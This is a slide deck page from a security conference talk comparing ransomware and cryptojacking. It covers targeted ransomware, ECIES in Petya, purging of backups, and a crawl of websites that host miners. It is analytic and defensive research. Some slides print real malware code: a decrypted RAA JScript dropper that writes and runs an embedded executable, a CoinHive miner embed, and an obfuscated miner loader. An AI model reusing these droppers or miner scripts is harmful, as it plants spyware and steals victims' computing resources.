$30 off During Our Annual Pro Sale. View Details »

ToorCon XX: Ransomware versus Cryptojacking

ToorCon XX: Ransomware versus Cryptojacking


Ransomware and cryptojacking have been recognized as the top malware threats in 2018. Financially motivated cybercriminals are attracted to both since both remain viable means of generating illicit income. In this talk, we delve deep into the latest characteristics observed in ransomware and cryptojacking attacks. Modern ransomware go beyond mere data encryption and come bundled with other threats, while cryptojacking attacks exploit unsuspecting web users by deploying embedded JavaScript miners concealed in websites. We discuss the intricate characteristics of sophisticated modern ransomware variants, cryptojacking attacks, and the results of our web crawl identifying websites involved in cryptojacking. Finally, we compare ransomware and cryptojacking in terms of their potential to generate illicit income for cybercriminals versus the levels of sophistication required to implement their respective campaigns.

Modern malware present multi-faceted threats that leverage a variety of attack vectors. Leading the malware threatscape in 2018 are ransomware and cryptojacking attacks, and the more evolved variants are now implementing targeted attacks against organizations (e.g. SamSam). These modern ransomware include a hybrid cryptosystem that uses a combination of symmetric and asymmetric cryptography. In recent practice, ransomware are going beyond mere data encryption and come bundled with other threats. We present real-world cases of ransomware where we observed these cryptoviral extortions drop trojan horses (e.g. RAA dropping pony) and cryptominers (e.g. BlackRuby). Our research shows that these secondary infections remain active on host even after the ransom is paid. During this talk, we will also discuss how elliptic curve cryptography (ECIES) is deployed in modern ransomware (e.g. Petya and PetrWrap) and the tactical advantages it provides (over RSA) to ransomware operators. We will show how many ransomware variants purge shadow copies (via vssadmin), encrypt network backups (using WNetAddConnection2), and use the latest anti-virus circumvention techniques such as “process doppelganging” (e.g. SynAck ransomware). In addition, we will discuss the results of our preliminary web crawl that identified cryptojacking scripts embedded across a variety of websites. We will discuss just how cryptojacking works, why it is rampantly spreading, how it effects organizations and individuals and how to effectively protect an organization and its employees against it.

In conclusion, we will discuss the future of the most potent ransomware and cryptojacking malware as predicted via analysis of real-world malware samples observed lately in the wild. We will also explore new attack vectors (besides phishing) deployed by these malware such as exploiting critical vulnerabilities (e.g. the infamous EternalBlue) or brute forcing remote services (e.g. RDP or SSH). All arguments presented during the talk will be backed by empirical evidence in form of system snapshots, code snippets, and network packet dumps as collected from real-world malware.

Pranshu Bajpai

September 15, 2018

More Decks by Pranshu Bajpai

Other Decks in Technology


  1. Ransomware Versus Cryptojacking Latest Trends in Modern Malware -Pranshu Bajpai

  2. @amirootyet 2

  3. 1. Introduction 3

  4. ~#whoami ↵ Pranshu Bajpai • PhD candidate at Michigan State

    University • Security Researcher at SRG • Previously worked as an independent penetration tester • Active speaker at security conferences: DEFCON, GrrCon, ToorCon, BSides, APWG eCrime... https://twitter.com/amirootyet https://www.linkedin.com/in/pranshubajpai http://www.cse.msu.edu/~bajpaipr/ Richard Enbody • Associate Professor at Michigan State University • Books: Targeted Cyber Attacks, The Practice of Computing using Python http://www.cse.msu.edu/~enbody/ 4
  5. Ransomware Die Hard! 5

  6. Defining characteristics of a ransomware 6 Obtain encryption secret 2

    Encrypt files 3 Demand ransom 4 Infiltrate 1
  7. Hybrid encryption model ▣ Hybrid encryption ▣ A Key-Management-Based Taxonomy

    for Ransomware- Pranshu Bajpai, Aditya K Sood, Richard Enbody https://ieeexplore.ieee.org/document/8376213/ 7
  8. 2. Trends in Ransomware 8

  9. Targeted ransomware attacks ▣ Not your run-of-the-mill spray-and-pray type infections

    ▣ Victims are carefully chosen ▣ Example: SamSam ◦ Attack vector: weakly secured RDP ◦ Privilege escalation ◦ Kill AV and infect ◦ $6 million and counting… (1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR) 9
  10. Add a miner! ▣ Cryptojacking is on the rise ▣

    Bundle a mining routine with the ransomware ▣ Examples: BlackRuby, Blue Blackmail (Obama-themed ransomware) Motivation ▣ Runs in the background while waiting for ransom ▣ Favorable to ransomware developers in context of developing countries ▣ Something is better than nothing (ransom demand not met) 10
  11. Elliptic curve cryptography Motivation ▣ Better for marketing ▣ Not

    as closely scrutinized as RSA 11
  12. Elliptic curve cryptography ▣ Ransomware use Elliptic Curve Integrated Encryption

    Scheme or ECIES ▣ scp192k1 deployed in Petya ◦ Base point, G = 03DB4FF10EC057E9AE26B07D0280B7F4341DA5D1B1EAE06C7D ◦ Domain Parameters and public key, P, ships with the ransomware ◦ Secret integer, s, is kept safe with the attacker 12
  13. ECIES Upon infection: ▣ Generate random integer, t CryptGenRandom! ▣

    Q = [t] G ▣ h = H([t]P) encryption key! ▣ Encrypt using h ▣ Purge t and h from host Upon receiving payment: ▣ Demand Q from victim [s]Q = [t]P important property! ▣ h = H([s]Q) ▣ Attacker sends h to victim 13
  14. Purge backups ▣ Backups ◦ Mapped drive on network ◦

    Windows Shadow Volume copies ◦ Cloud storage (OneDrive, Google Drive…) ▣ Ransomware ◦ Explicitly hunt for and encrypt network shares ◦ Purge VSS files on host ◦ Abuse sync clients of cloud storage services to encrypt files stored in cloud 14
  15. Place your screenshot here Purging VSS files Samsam ransomware quietly

    deletes shadow copies 15
  16. Place your screenshot here Mapping network shares WNetAddConnection is used

    map network shares on Windows 16
  17. Dropping spyware 17 function NWvQtGjjfQX() { var data_pn = "TVrDiQNMSFE(...)QQURE";

    var cmd = "U2FsdGVkX1/LHQl+aIAo/hXHDEI5YmZZtBIcL..."; var dec_cmd = CryptoJS.AES.decrypt(cmd, key_cmd); dec_cmd = CryptoJS.enc.Utf8.stringify(dec_cmd); eval(dec_cmd); return 0; } ... // decrypts to the following code // ... var flo = new ActiveXObject("ADODB.Stream"); var runer = WScript.CreateObject("WScript.Shell"); var wher = runer.SpecialFolders("MyDocuments"); wher = wher + "\\" + "st.exe"; flo.CharSet = "437"; flo.Open(); var pny = data_pn.replace(/NMSIOP/g, "A"); var pny_ar = CryptoJS.enc.Base64.parse(pny); var pny_dec = pny_ar.toString(CryptoJS.enc.Utf8); flo.Position = 0; flo.SetEOS; flo.WriteText(pny_dec); flo.SaveToFile(wher, 2); flo.Close; wher = "\"" + wher + "\""; runer.Run(wher);
  18. Place your screenshot here Dropping spyware RAA ransomware dropping pony

  19. Attack vectors ▣ Social engineering has been the predominant attack

    vector ▣ Relies on exploiting human gullibility ▣ Attackers are moving on to more efficient attack vectors ▣ WannaCry and NotPetya exploited EternalBlue ▣ SamSam exploits weakly secured RDP ▣ Weakly secured SSH ▣ More to come… 19
  20. Place your screenshot here WannaCry Scans port 445 20

  21. 3. Cryptojacking 21

  22. Bitcoin made ransomware possible; Monero made cryptojacking possible. 22

  23. Abo cr p ojacking aka dri e-by-mining ▣ Unauthorized use

    of processing power to mine cryptocurrencies ▣ Offshoot of the rise in valuation of cryptocurrencies ▣ Preying on the general lack of awareness about cryptojacking ▣ Easy to pull off using an available JavaScript miner ▣ Subtle and hard to detect by the average computer user ▣ Does not need specialized hardware anymore -- the average CPU is good enough 23
  24. The problem with cryptojacking ▣ Immediate problem ◦ Cost of

    electrical power ▣ Long term concern ◦ Electromigration damaging the processor ▣ Extreme case scenario ◦ Processor catching fire 24
  25. Types of cryptojacking ▣ Install a mining application on host

    ◦ Trick the user into installing one ◦ Exploit a vulnerability and install one (RedisWannaMine) ▣ JavaScript based miners ◦ Lure victims to a webpage that runs an embedded JS miner ◦ Inject mining scripts into ad networks that legitimate websites then serve to their visitors 25
  26. 4. Cryptojacking on the Web 26

  27. Example of a JS-based mining script 27 <script src='https://coinhive.com/lib/coinhive.min.js'></script> <script>

    var miner = new CoinHive.User('BQey5NM18Qz6T1Xak3QNJNxpp3uFUg4m', 'hexm4n'); miner.start(); </script>
  28. Example of a JS-based mining script 28

  29. Impact on system resources 29

  30. Cryptojacking on the Internet (preliminary analysis) ▣ Crawl the web

    looking for unauthorized coinhive miners ◦ publicwww, nerdydata, censys ▣ How do we determine the "unauthorized" part? ▣ How do we validate the results? ◦ Some websites are now unavailable ◦ Some websites have now cleaned the source code ▣ How do we get around code obfuscation? 30
  31. Code obfuscation 31

  32. Deobfuscation 32 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)) {while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1}; while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p} ('$.9("a://b-8.6/2/3.7.4",c(){h

    1=d l.j(\'i\',{e:f,g:0.5});1.k()});',22,22, '|mm|lib|coinhive|js||com|min|hive|getScript|https|coin|function|new|autoThreads|false|throttle|var|y0wAs4 sRdgKE3ND7isH5yY9ggozmW1wk|Anonymous|start|CoinHive'.split('|'),0,{})) $.getScript("https://coin-hive.com/lib/coinhive.min.js", function() { var mm = new CoinHive.Anonymous('y0wAs4sRdgKE3ND7isH5yY9ggozmW1wk', { autoThreads: false, throttle: 0.5 }); mm.start() });
  33. Crawl results analysis ▣ Identified 212 websites involved in cryptojacking

    ▣ Resolve websites to “categories” ◦ Pornography? Business? IT? Malicious? ◦ Use the FortiGuard web filter categories: ▪ https://fortiguard.com/webfilter/categories 34
  34. Cryptojacking website categories 35

  35. Geographic distribution 36

  36. Discussion ▣ Many cryptojacking websites are involved in other dubious

    practices ◦ Illegal video content ◦ Pirated software and games ◦ Distributing malware ◦ ... ▣ Streaming media websites provide the best opportunity for cryptojacking 37
  37. IoT Cryptojacking ▣ Why? ◦ Why not? ▣ Relevant factors

    ◦ Gaining initial entry ▪ IoT devices are usually more vulnerable ◦ Profit potential ▪ Do IoT devices today have enough computation power? 38
  38. Cryptojacking economics (processing power) 39 Device Hashes/s I7 processor 150

    Amazon Firestick 5 Samsung Galaxy S9 25 Samsung Galaxy Gear S3 0.4
  39. Cryptojacking economics (Monero valuation with time) https://www.coingecko.com/en/price_charts/monero/usd 40

  40. Real concern ▣ Cleverer cryptojacking attacks ◦ Improved attack vectors

    ◦ Stealthy mining using only part of the CPU ◦ Google Play and App Store apps that mine in the background 41
  41. Protection against cryptojacking ▣ Update! ▣ Use antivirus solutions ▣

    User awareness ▣ Monitor system resources (CPU consumption) ▣ Install browser extensions that block mining scripts ▣ NoScript 42
  42. Ransomware ▣ Intricate cryptographic acrobatics ▣ No ransom guarantees after

    infection ▣ Ransomware is known to the average user ▣ Noisy ransom notes ▣ OS dependent Conclusion Cryptojacking ▣ Relatively straightforward ▣ Cryptocurrency already mined or stolen is guaranteed money ▣ Cryptojacking is still a very new concept ▣ Covert long term mining ▣ OS independent 43
  43. Thank You! @amirootyet 44